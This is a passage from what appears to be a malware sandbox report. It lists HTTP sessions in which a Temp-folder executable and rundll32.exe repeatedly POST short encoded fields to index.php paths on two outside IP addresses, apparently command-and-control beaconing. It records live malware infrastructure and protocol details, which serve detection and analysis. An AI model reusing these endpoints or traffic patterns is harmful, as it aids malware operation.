Dec 13, 2024 07:47:14.440793037 CET	711	IN	HTTP/1.1 200 OK Date: Fri, 13 Dec 2024 14:47:13 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 X-Powered-By: PHP/8.2.12 Content-Length: 512 Content-Type: text/html; charset=UTF-8 Data Raw: 20 2b 2b 2b 5f 31 5f 64 61 38 30 66 39 36 39 30 35 37 32 65 31 39 38 36 31 38 62 31 39 62 61 33 64 32 34 61 64 64 37 63 39 36 61 66 39 65 62 38 35 65 32 38 35 37 35 62 62 65 39 65 64 64 35 63 62 64 33 63 64 61 32 64 66 33 36 2d 31 2d 5f 32 5f 64 62 63 63 63 65 36 31 35 62 37 61 66 35 66 62 35 63 38 66 37 33 63 65 36 61 37 30 39 39 61 65 39 34 36 39 39 64 61 34 64 37 62 30 63 30 33 36 61 66 61 61 62 63 64 65 61 62 38 30 38 38 65 36 62 39 37 37 33 34 64 38 62 33 35 62 33 63 64 30 39 31 38 65 2d 32 2d 5f 33 5f 61 37 65 35 39 35 32 31 30 35 35 64 65 39 62 38 34 38 63 65 30 31 62 65 36 32 37 61 39 61 65 38 64 38 31 66 65 34 63 36 64 33 66 64 62 35 36 63 61 39 65 65 63 66 62 36 64 63 63 33 65 33 38 35 64 64 30 39 2d 33 2d 5f 34 5f 61 66 65 31 39 34 33 33 30 63 35 63 63 39 38 66 34 30 64 35 37 39 39 66 33 36 32 30 61 33 64 62 65 30 33 37 63 31 65 32 66 62 63 33 39 35 34 31 38 63 64 63 63 32 38 31 65 66 66 35 63 30 39 64 63 64 37 30 2d 34 2d 5f 35 5f 64 66 38 64 64 64 32 35 31 36 36 61 65 36 62 63 36 38 38 [TRUNCATED] Data Ascii: +++_1_da80f9690572e198618b19ba3d24add7c96af9eb85e28575bbe9edd5cbd3cda2df36-1-_2_dbccce615b7af5fb5c8f73ce6a7099ae94699da4d7b0c036afaabcdeab8088e6b97734d8b35b3cd0918e-2-_3_a7e59521055de9b848ce01be627a9ae8d81fe4c6d3fdb56ca9eecfb6dcc3e385dd09-3-_4_afe194330c5cc98f40d5799f3620a3dbe037c1e2fbc395418cdcc281eff5c09dcd70-4-_5_df8ddd25166ae6bc688801a7046689e6fa0b90f1f4e4b67eb3ace0a4ef85f9e2ea2357a0a87c29b3cdfeb021529870fbff2545a5ed8b81c585c8bc733bec2141b47a9370c65b5e2cb9c202ac4b1ae864feec8d47224f0cce61822e259c2411-5-

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
13	192.168.2.4	49749	185.81.68.147	80	888	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
Dec 13, 2024 07:47:13.179549932 CET	156	OUT	POST /7vhfjke3/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.81.68.147 Content-Length: 5 Cache-Control: no-cache Data Raw: 77 6c 74 3d 31 Data Ascii: wlt=1
Dec 13, 2024 07:47:14.549736977 CET	711	IN	HTTP/1.1 200 OK Date: Fri, 13 Dec 2024 14:47:13 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 X-Powered-By: PHP/8.2.12 Content-Length: 512 Content-Type: text/html; charset=UTF-8 Data Raw: 20 2b 2b 2b 5f 31 5f 64 61 38 30 66 39 36 39 30 35 37 32 65 31 39 38 36 31 38 62 31 39 62 61 33 64 32 34 61 64 64 37 63 39 36 61 66 39 65 62 38 35 65 32 38 35 37 35 62 62 65 39 65 64 64 35 63 62 64 33 63 64 61 32 64 66 33 36 2d 31 2d 5f 32 5f 64 62 63 63 63 65 36 31 35 62 37 61 66 35 66 62 35 63 38 66 37 33 63 65 36 61 37 30 39 39 61 65 39 34 36 39 39 64 61 34 64 37 62 30 63 30 33 36 61 66 61 61 62 63 64 65 61 62 38 30 38 38 65 36 62 39 37 37 33 34 64 38 62 33 35 62 33 63 64 30 39 31 38 65 2d 32 2d 5f 33 5f 61 37 65 35 39 35 32 31 30 35 35 64 65 39 62 38 34 38 63 65 30 31 62 65 36 32 37 61 39 61 65 38 64 38 31 66 65 34 63 36 64 33 66 64 62 35 36 63 61 39 65 65 63 66 62 36 64 63 63 33 65 33 38 35 64 64 30 39 2d 33 2d 5f 34 5f 61 66 65 31 39 34 33 33 30 63 35 63 63 39 38 66 34 30 64 35 37 39 39 66 33 36 32 30 61 33 64 62 65 30 33 37 63 31 65 32 66 62 63 33 39 35 34 31 38 63 64 63 63 32 38 31 65 66 66 35 63 30 39 64 63 64 37 30 2d 34 2d 5f 35 5f 64 66 38 64 64 64 32 35 31 36 36 61 65 36 62 63 36 38 38 [TRUNCATED] Data Ascii: +++_1_da80f9690572e198618b19ba3d24add7c96af9eb85e28575bbe9edd5cbd3cda2df36-1-_2_dbccce615b7af5fb5c8f73ce6a7099ae94699da4d7b0c036afaabcdeab8088e6b97734d8b35b3cd0918e-2-_3_a7e59521055de9b848ce01be627a9ae8d81fe4c6d3fdb56ca9eecfb6dcc3e385dd09-3-_4_afe194330c5cc98f40d5799f3620a3dbe037c1e2fbc395418cdcc281eff5c09dcd70-4-_5_df8ddd25166ae6bc688801a7046689e6fa0b90f1f4e4b67eb3ace0a4ef85f9e2ea2357a0a87c29b3cdfeb021529870fbff2545a5ed8b81c585c8bc733bec2141b47a9370c65b5e2cb9c202ac4b1ae864feec8d47224f0cce61822e259c2411-5-

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
14	192.168.2.4	49750	185.81.68.148	80	6968	C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe

Timestamp	Bytes transferred	Direction	Data
Dec 13, 2024 07:47:13.515197039 CET	310	OUT	POST /8Fvu5jh4DbS/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.81.68.148 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 38 32 44 30 39 36 36 33 35 41 32 39 41 31 46 41 30 41 38 39 37 46 43 35 36 30 32 35 43 32 45 39 44 45 36 34 39 44 42 43 38 37 42 39 38 32 36 33 46 30 41 42 45 43 44 35 46 41 44 34 38 43 42 45 46 43 37 46 33 33 38 39 42 42 30 35 36 39 38 30 44 32 38 37 42 39 32 32 37 41 39 33 32 31 39 44 41 30 34 30 30 34 43 39 46 33 38 45 46 46 39 36 42 42 46 46 38 38 34 34 32 38 42 35 34 46 37 39 39 35 30 37 45 41 30 46 45 39 35 45 30 30 37 32 42 35 45 30 36 31 43 38 Data Ascii: r=82D096635A29A1FA0A897FC56025C2E9DE649DBC87B98263F0ABECD5FAD48CBEFC7F3389BB056980D287B9227A93219DA04004C9F38EFF96BBFF884428B54F799507EA0FE95E0072B5E061C8
Dec 13, 2024 07:47:14.878485918 CET	204	IN	HTTP/1.1 200 OK Date: Fri, 13 Dec 2024 14:47:14 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 X-Powered-By: PHP/8.2.12 Content-Length: 7 Content-Type: text/html; charset=UTF-8 Data Raw: 20 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
15	192.168.2.4	49751	185.81.68.147	80	6968	C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe

Timestamp	Bytes transferred	Direction	Data
Dec 13, 2024 07:47:13.547077894 CET	307	OUT	POST /7vhfjke3/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.81.68.147 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 38 32 44 30 39 36 36 33 35 41 32 39 41 31 46 41 30 41 38 39 37 46 43 35 36 30 32 35 43 32 45 39 44 45 36 34 39 44 42 43 38 37 42 39 38 32 36 33 46 30 41 42 45 43 44 35 46 41 44 34 38 43 42 45 46 43 37 46 33 33 38 39 42 42 30 35 36 39 38 30 44 32 38 37 42 39 32 32 37 41 39 33 32 31 39 44 41 30 34 30 30 34 43 39 46 33 38 45 46 46 39 36 42 42 46 46 38 38 34 34 32 38 42 35 34 46 37 39 39 35 30 37 45 41 30 46 45 39 35 45 30 30 37 32 42 35 45 30 36 31 43 38 Data Ascii: r=82D096635A29A1FA0A897FC56025C2E9DE649DBC87B98263F0ABECD5FAD48CBEFC7F3389BB056980D287B9227A93219DA04004C9F38EFF96BBFF884428B54F799507EA0FE95E0072B5E061C8
Dec 13, 2024 07:47:14.895461082 CET	204	IN	HTTP/1.1 200 OK Date: Fri, 13 Dec 2024 14:47:14 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 X-Powered-By: PHP/8.2.12 Content-Length: 7 Content-Type: text/html; charset=UTF-8 Data Raw: 20 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
16	192.168.2.4	49752	185.81.68.148	80	6828	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
Dec 13, 2024 07:47:14.570233107 CET	159	OUT	POST /8Fvu5jh4DbS/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.81.68.148 Content-Length: 5 Cache-Control: no-cache Data Raw: 77 6c 74 3d 31 Data Ascii: wlt=1
Dec 13, 2024 07:47:15.970062017 CET	711	IN	HTTP/1.1 200 OK Date: Fri, 13 Dec 2024 14:47:15 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 X-Powered-By: PHP/8.2.12 Content-Length: 512 Content-Type: text/html; charset=UTF-8 Data Raw: 20 2b 2b 2b 5f 31 5f 64 61 38 30 66 39 36 39 30 35 37 32 65 31 39 38 36 31 38 62 31 39 62 61 33 64 32 34 61 64 64 37 63 39 36 61 66 39 65 62 38 35 65 32 38 35 37 35 62 62 65 39 65 64 64 35 63 62 64 33 63 64 61 32 64 66 33 36 2d 31 2d 5f 32 5f 64 62 63 63 63 65 36 31 35 62 37 61 66 35 66 62 35 63 38 66 37 33 63 65 36 61 37 30 39 39 61 65 39 34 36 39 39 64 61 34 64 37 62 30 63 30 33 36 61 66 61 61 62 63 64 65 61 62 38 30 38 38 65 36 62 39 37 37 33 34 64 38 62 33 35 62 33 63 64 30 39 31 38 65 2d 32 2d 5f 33 5f 61 37 65 35 39 35 32 31 30 35 35 64 65 39 62 38 34 38 63 65 30 31 62 65 36 32 37 61 39 61 65 38 64 38 31 66 65 34 63 36 64 33 66 64 62 35 36 63 61 39 65 65 63 66 62 36 64 63 63 33 65 33 38 35 64 64 30 39 2d 33 2d 5f 34 5f 61 66 65 31 39 34 33 33 30 63 35 63 63 39 38 66 34 30 64 35 37 39 39 66 33 36 32 30 61 33 64 62 65 30 33 37 63 31 65 32 66 62 63 33 39 35 34 31 38 63 64 63 63 32 38 31 65 66 66 35 63 30 39 64 63 64 37 30 2d 34 2d 5f 35 5f 64 66 38 64 64 64 32 35 31 36 36 61 65 36 62 63 36 38 38 [TRUNCATED] Data Ascii: +++_1_da80f9690572e198618b19ba3d24add7c96af9eb85e28575bbe9edd5cbd3cda2df36-1-_2_dbccce615b7af5fb5c8f73ce6a7099ae94699da4d7b0c036afaabcdeab8088e6b97734d8b35b3cd0918e-2-_3_a7e59521055de9b848ce01be627a9ae8d81fe4c6d3fdb56ca9eecfb6dcc3e385dd09-3-_4_afe194330c5cc98f40d5799f3620a3dbe037c1e2fbc395418cdcc281eff5c09dcd70-4-_5_df8ddd25166ae6bc688801a7046689e6fa0b90f1f4e4b67eb3ace0a4ef85f9e2ea2357a0a87c29b3cdfeb021529870fbff2545a5ed8b81c585c8bc733bec2141b47a9370c65b5e2cb9c202ac4b1ae864feec8d47224f0cce61822e259c2411-5-

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
17	192.168.2.4	49753	185.81.68.148	80	888	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
Dec 13, 2024 07:47:14.672689915 CET	159	OUT	POST /8Fvu5jh4DbS/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.81.68.148 Content-Length: 5 Cache-Control: no-cache Data Raw: 77 6c 74 3d 31 Data Ascii: wlt=1
Dec 13, 2024 07:47:16.063846111 CET	711	IN	HTTP/1.1 200 OK Date: Fri, 13 Dec 2024 14:47:15 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 X-Powered-By: PHP/8.2.12 Content-Length: 512 Content-Type: text/html; charset=UTF-8 Data Raw: 20 2b 2b 2b 5f 31 5f 64 61 38 30 66 39 36 39 30 35 37 32 65 31 39 38 36 31 38 62 31 39 62 61 33 64 32 34 61 64 64 37 63 39 36 61 66 39 65 62 38 35 65 32 38 35 37 35 62 62 65 39 65 64 64 35 63 62 64 33 63 64 61 32 64 66 33 36 2d 31 2d 5f 32 5f 64 62 63 63 63 65 36 31 35 62 37 61 66 35 66 62 35 63 38 66 37 33 63 65 36 61 37 30 39 39 61 65 39 34 36 39 39 64 61 34 64 37 62 30 63 30 33 36 61 66 61 61 62 63 64 65 61 62 38 30 38 38 65 36 62 39 37 37 33 34 64 38 62 33 35 62 33 63 64 30 39 31 38 65 2d 32 2d 5f 33 5f 61 37 65 35 39 35 32 31 30 35 35 64 65 39 62 38 34 38 63 65 30 31 62 65 36 32 37 61 39 61 65 38 64 38 31 66 65 34 63 36 64 33 66 64 62 35 36 63 61 39 65 65 63 66 62 36 64 63 63 33 65 33 38 35 64 64 30 39 2d 33 2d 5f 34 5f 61 66 65 31 39 34 33 33 30 63 35 63 63 39 38 66 34 30 64 35 37 39 39 66 33 36 32 30 61 33 64 62 65 30 33 37 63 31 65 32 66 62 63 33 39 35 34 31 38 63 64 63 63 32 38 31 65 66 66 35 63 30 39 64 63 64 37 30 2d 34 2d 5f 35 5f 64 66 38 64 64 64 32 35 31 36 36 61 65 36 62 63 36 38 38 [TRUNCATED] Data Ascii: +++_1_da80f9690572e198618b19ba3d24add7c96af9eb85e28575bbe9edd5cbd3cda2df36-1-_2_dbccce615b7af5fb5c8f73ce6a7099ae94699da4d7b0c036afaabcdeab8088e6b97734d8b35b3cd0918e-2-_3_a7e59521055de9b848ce01be627a9ae8d81fe4c6d3fdb56ca9eecfb6dcc3e385dd09-3-_4_afe194330c5cc98f40d5799f3620a3dbe037c1e2fbc395418cdcc281eff5c09dcd70-4-_5_df8ddd25166ae6bc688801a7046689e6fa0b90f1f4e4b67eb3ace0a4ef85f9e2ea2357a0a87c29b3cdfeb021529870fbff2545a5ed8b81c585c8bc733bec2141b47a9370c65b5e2cb9c202ac4b1ae864feec8d47224f0cce61822e259c2411-5-

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
18	192.168.2.4	49754	185.81.68.148	80	6968	C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe

Timestamp	Bytes transferred	Direction	Data
Dec 13, 2024 07:47:16.704993010 CET	158	OUT	POST /8Fvu5jh4DbS/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.81.68.148 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Dec 13, 2024 07:47:18.049957991 CET	205	IN	HTTP/1.1 200 OK Date: Fri, 13 Dec 2024 14:47:17 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 X-Powered-By: PHP/8.2.12 Content-Length: 8 Content-Type: text/html; charset=UTF-8 Data Raw: 20 3c 63 3e 33 3c 64 3e Data Ascii: <c>3<d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
19	192.168.2.4	49755	185.81.68.147	80	6968	C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe

Timestamp	Bytes transferred	Direction	Data
Dec 13, 2024 07:47:16.719799042 CET	155	OUT	POST /7vhfjke3/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.81.68.147 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Dec 13, 2024 07:47:18.064918995 CET	205	IN	HTTP/1.1 200 OK Date: Fri, 13 Dec 2024 14:47:17 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 X-Powered-By: PHP/8.2.12 Content-Length: 8 Content-Type: text/html; charset=UTF-8 Data Raw: 20 3c 63 3e 33 3c 64 3e Data Ascii: <c>3<d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
20	192.168.2.4	49758	185.81.68.147	80	6968	C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe

Timestamp	Bytes transferred	Direction	Data
Dec 13, 2024 07:47:19.921533108 CET	307	OUT	POST /7vhfjke3/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.81.68.147 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 38 32 44 30 39 36 36 33 35 41 32 39 41 31 46 41 30 41 38 39 37 46 43 35 36 30 32 35 43 32 45 39 44 45 36 34 39 44 42 43 38 37 42 39 38 32 36 33 46 30 41 42 45 43 44 35 46 41 44 34 38 43 42 45 46 43 37 46 33 33 38 39 42 42 30 35 36 39 38 30 44 32 38 37 42 39 32 32 37 41 39 33 32 31 39 44 41 30 34 30 30 34 43 39 46 33 38 45 46 46 39 36 42 42 46 46 38 38 34 34 32 38 42 35 34 46 37 39 39 35 30 37 45 41 30 46 45 39 35 45 30 30 37 32 42 35 45 30 36 31 43 38 Data Ascii: r=82D096635A29A1FA0A897FC56025C2E9DE649DBC87B98263F0ABECD5FAD48CBEFC7F3389BB056980D287B9227A93219DA04004C9F38EFF96BBFF884428B54F799507EA0FE95E0072B5E061C8
Dec 13, 2024 07:47:21.282970905 CET	204	IN	HTTP/1.1 200 OK Date: Fri, 13 Dec 2024 14:47:20 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 X-Powered-By: PHP/8.2.12 Content-Length: 7 Content-Type: text/html; charset=UTF-8 Data Raw: 20 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
21	192.168.2.4	49757	185.81.68.148	80	6968	C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe

Timestamp	Bytes transferred	Direction	Data
Dec 13, 2024 07:47:19.921536922 CET	310	OUT	POST /8Fvu5jh4DbS/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.81.68.148 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 38 32 44 30 39 36 36 33 35 41 32 39 41 31 46 41 30 41 38 39 37 46 43 35 36 30 32 35 43 32 45 39 44 45 36 34 39 44 42 43 38 37 42 39 38 32 36 33 46 30 41 42 45 43 44 35 46 41 44 34 38 43 42 45 46 43 37 46 33 33 38 39 42 42 30 35 36 39 38 30 44 32 38 37 42 39 32 32 37 41 39 33 32 31 39 44 41 30 34 30 30 34 43 39 46 33 38 45 46 46 39 36 42 42 46 46 38 38 34 34 32 38 42 35 34 46 37 39 39 35 30 37 45 41 30 46 45 39 35 45 30 30 37 32 42 35 45 30 36 31 43 38 Data Ascii: r=82D096635A29A1FA0A897FC56025C2E9DE649DBC87B98263F0ABECD5FAD48CBEFC7F3389BB056980D287B9227A93219DA04004C9F38EFF96BBFF884428B54F799507EA0FE95E0072B5E061C8
Dec 13, 2024 07:47:21.332618952 CET	204	IN	HTTP/1.1 200 OK Date: Fri, 13 Dec 2024 14:47:20 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 X-Powered-By: PHP/8.2.12 Content-Length: 7 Content-Type: text/html; charset=UTF-8 Data Raw: 20 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
22	192.168.2.4	49759	185.81.68.147	80	6968	C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe

Timestamp	Bytes transferred	Direction	Data
Dec 13, 2024 07:47:23.031424999 CET	155	OUT	POST /7vhfjke3/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.81.68.147 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Dec 13, 2024 07:47:24.376986027 CET	205	IN	HTTP/1.1 200 OK Date: Fri, 13 Dec 2024 14:47:23 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 X-Powered-By: PHP/8.2.12 Content-Length: 8 Content-Type: text/html; charset=UTF-8 Data Raw: 20 3c 63 3e 33 3c 64 3e Data Ascii: <c>3<d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
23	192.168.2.4	49760	185.81.68.148	80	6968	C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe

Timestamp	Bytes transferred	Direction	Data
Dec 13, 2024 07:47:23.079931021 CET	158	OUT	POST /8Fvu5jh4DbS/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.81.68.148 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Dec 13, 2024 07:47:24.424125910 CET	205	IN	HTTP/1.1 200 OK Date: Fri, 13 Dec 2024 14:47:23 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 X-Powered-By: PHP/8.2.12 Content-Length: 8 Content-Type: text/html; charset=UTF-8 Data Raw: 20 3c 63 3e 33 3c 64 3e Data Ascii: <c>3<d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
24	192.168.2.4	49761	185.81.68.147	80	6968	C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe

Timestamp	Bytes transferred	Direction	Data
Dec 13, 2024 07:47:26.016742945 CET	307	OUT	POST /7vhfjke3/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.81.68.147 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 38 32 44 30 39 36 36 33 35 41 32 39 41 31 46 41 30 41 38 39 37 46 43 35 36 30 32 35 43 32 45 39 44 45 36 34 39 44 42 43 38 37 42 39 38 32 36 33 46 30 41 42 45 43 44 35 46 41 44 34 38 43 42 45 46 43 37 46 33 33 38 39 42 42 30 35 36 39 38 30 44 32 38 37 42 39 32 32 37 41 39 33 32 31 39 44 41 30 34 30 30 34 43 39 46 33 38 45 46 46 39 36 42 42 46 46 38 38 34 34 32 38 42 35 34 46 37 39 39 35 30 37 45 41 30 46 45 39 35 45 30 30 37 32 42 35 45 30 36 31 43 38 Data Ascii: r=82D096635A29A1FA0A897FC56025C2E9DE649DBC87B98263F0ABECD5FAD48CBEFC7F3389BB056980D287B9227A93219DA04004C9F38EFF96BBFF884428B54F799507EA0FE95E0072B5E061C8
Dec 13, 2024 07:47:27.397629023 CET	204	IN	HTTP/1.1 200 OK Date: Fri, 13 Dec 2024 14:47:26 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 X-Powered-By: PHP/8.2.12 Content-Length: 7 Content-Type: text/html; charset=UTF-8 Data Raw: 20 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
25	192.168.2.4	49762	185.81.68.148	80	6968	C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe

Timestamp	Bytes transferred	Direction	Data
Dec 13, 2024 07:47:26.064805031 CET	310	OUT	POST /8Fvu5jh4DbS/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.81.68.148 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 38 32 44 30 39 36 36 33 35 41 32 39 41 31 46 41 30 41 38 39 37 46 43 35 36 30 32 35 43 32 45 39 44 45 36 34 39 44 42 43 38 37 42 39 38 32 36 33 46 30 41 42 45 43 44 35 46 41 44 34 38 43 42 45 46 43 37 46 33 33 38 39 42 42 30 35 36 39 38 30 44 32 38 37 42 39 32 32 37 41 39 33 32 31 39 44 41 30 34 30 30 34 43 39 46 33 38 45 46 46 39 36 42 42 46 46 38 38 34 34 32 38 42 35 34 46 37 39 39 35 30 37 45 41 30 46 45 39 35 45 30 30 37 32 42 35 45 30 36 31 43 38 Data Ascii: r=82D096635A29A1FA0A897FC56025C2E9DE649DBC87B98263F0ABECD5FAD48CBEFC7F3389BB056980D287B9227A93219DA04004C9F38EFF96BBFF884428B54F799507EA0FE95E0072B5E061C8
Dec 13, 2024 07:47:27.440025091 CET	204	IN	HTTP/1.1 200 OK Date: Fri, 13 Dec 2024 14:47:26 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 X-Powered-By: PHP/8.2.12 Content-Length: 7 Content-Type: text/html; charset=UTF-8 Data Raw: 20 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
26	192.168.2.4	49763	185.81.68.147	80	6968	C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe

Timestamp	Bytes transferred	Direction	Data
Dec 13, 2024 07:47:29.144040108 CET	155	OUT	POST /7vhfjke3/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.81.68.147 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Dec 13, 2024 07:47:30.477885962 CET	205	IN	HTTP/1.1 200 OK Date: Fri, 13 Dec 2024 14:47:29 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 X-Powered-By: PHP/8.2.12 Content-Length: 8 Content-Type: text/html; charset=UTF-8 Data Raw: 20 3c 63 3e 33 3c 64 3e Data Ascii: <c>3<d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
27	192.168.2.4	49764	185.81.68.148	80	6968	C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe

Timestamp	Bytes transferred	Direction	Data
Dec 13, 2024 07:47:29.191658974 CET	158	OUT	POST /8Fvu5jh4DbS/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.81.68.148 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Dec 13, 2024 07:47:30.534275055 CET	205	IN	HTTP/1.1 200 OK Date: Fri, 13 Dec 2024 14:47:29 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 X-Powered-By: PHP/8.2.12 Content-Length: 8 Content-Type: text/html; charset=UTF-8 Data Raw: 20 3c 63 3e 33 3c 64 3e Data Ascii: <c>3<d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
28	192.168.2.4	49765	185.81.68.147	80	6968	C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe

Timestamp	Bytes transferred	Direction	Data
Dec 13, 2024 07:47:32.124402046 CET	307	OUT	POST /7vhfjke3/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.81.68.147 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 38 32 44 30 39 36 36 33 35 41 32 39 41 31 46 41 30 41 38 39 37 46 43 35 36 30 32 35 43 32 45 39 44 45 36 34 39 44 42 43 38 37 42 39 38 32 36 33 46 30 41 42 45 43 44 35 46 41 44 34 38 43 42 45 46 43 37 46 33 33 38 39 42 42 30 35 36 39 38 30 44 32 38 37 42 39 32 32 37 41 39 33 32 31 39 44 41 30 34 30 30 34 43 39 46 33 38 45 46 46 39 36 42 42 46 46 38 38 34 34 32 38 42 35 34 46 37 39 39 35 30 37 45 41 30 46 45 39 35 45 30 30 37 32 42 35 45 30 36 31 43 38 Data Ascii: r=82D096635A29A1FA0A897FC56025C2E9DE649DBC87B98263F0ABECD5FAD48CBEFC7F3389BB056980D287B9227A93219DA04004C9F38EFF96BBFF884428B54F799507EA0FE95E0072B5E061C8
Dec 13, 2024 07:47:33.475101948 CET	204	IN	HTTP/1.1 200 OK Date: Fri, 13 Dec 2024 14:47:32 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 X-Powered-By: PHP/8.2.12 Content-Length: 7 Content-Type: text/html; charset=UTF-8 Data Raw: 20 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
29	192.168.2.4	49766	185.81.68.148	80	6968	C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe

Timestamp	Bytes transferred	Direction	Data
Dec 13, 2024 07:47:32.186872005 CET	310	OUT	POST /8Fvu5jh4DbS/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.81.68.148 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 38 32 44 30 39 36 36 33 35 41 32 39 41 31 46 41 30 41 38 39 37 46 43 35 36 30 32 35 43 32 45 39 44 45 36 34 39 44 42 43 38 37 42 39 38 32 36 33 46 30 41 42 45 43 44 35 46 41 44 34 38 43 42 45 46 43 37 46 33 33 38 39 42 42 30 35 36 39 38 30 44 32 38 37 42 39 32 32 37 41 39 33 32 31 39 44 41 30 34 30 30 34 43 39 46 33 38 45 46 46 39 36 42 42 46 46 38 38 34 34 32 38 42 35 34 46 37 39 39 35 30 37 45 41 30 46 45 39 35 45 30 30 37 32 42 35 45 30 36 31 43 38 Data Ascii: r=82D096635A29A1FA0A897FC56025C2E9DE649DBC87B98263F0ABECD5FAD48CBEFC7F3389BB056980D287B9227A93219DA04004C9F38EFF96BBFF884428B54F799507EA0FE95E0072B5E061C8
